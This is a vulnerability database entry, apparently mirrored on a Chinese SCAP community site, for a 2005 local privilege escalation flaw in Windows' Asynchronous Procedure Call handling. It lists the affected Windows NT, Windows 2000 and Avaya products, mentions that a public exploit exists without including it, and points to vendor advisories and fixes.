- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows Asynchronous Procedure Call Local Privilege Escalation Vulnerability
Design Error 15826
No Yes
2005-12-13 12:00:00 2009-07-12 05:56:00
Derek Soeder is credited for the discovery of this issue.

- 受影响的程序版本

Nortel Networks Centrex IP Element Manager 9.0
Nortel Networks Centrex IP Element Manager 8.0
Nortel Networks Centrex IP Element Manager 7.0
Nortel Networks Centrex IP Element Manager 2.5
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6a
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0 alpha
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows NT 4.0 SP6a alpha
Microsoft Windows NT 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Enterprise Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Server 4.0 SP6a
+ Microsoft Windows NT Terminal Server 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
+ Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT 4.0 SP6 alpha
Microsoft Windows NT 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Enterprise Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Terminal Server 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
+ Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT 4.0 SP5 alpha
Microsoft Windows NT 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Enterprise Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Terminal Server 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
+ Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT 4.0 SP4 alpha
Microsoft Windows NT 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Enterprise Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Terminal Server 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
+ Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT 4.0 SP3 alpha
Microsoft Windows NT 4.0 SP3 alpha
Microsoft Windows NT 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Enterprise Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Terminal Server 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
+ Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT 4.0 SP2 alpha
Microsoft Windows NT 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Enterprise Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Terminal Server 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
+ Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT 4.0 SP1 alpha
Microsoft Windows NT 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Enterprise Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Terminal Server 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
+ Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT 4.0 alpha
Microsoft Windows NT 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Enterprise Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Terminal Server 4.0
+ Microsoft Windows NT Workstation 4.0
+ Microsoft Windows NT Workstation 4.0
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya Unified Communications Center S3400
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
Avaya Modular Messaging (MAS)
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers

- 漏洞讨论

Microsoft Windows is susceptible to a local privilege-escalation vulnerability. This issue is due to a flaw in the Asynchronous Procedure Calls implementation in Microsoft Windows.

This issue allows local attackers to gain elevated privileges, facilitating the complete compromise of affected computers.

- 漏洞利用

An exploit by SeBeIt is available:

- 解决方案

Avaya has released advisory ASA-2005-234 detailing affected Avaya products. Please see the referenced advisory for further information.

An advisory and fixes are available from the vendor:


Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows 2000 Server SP4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站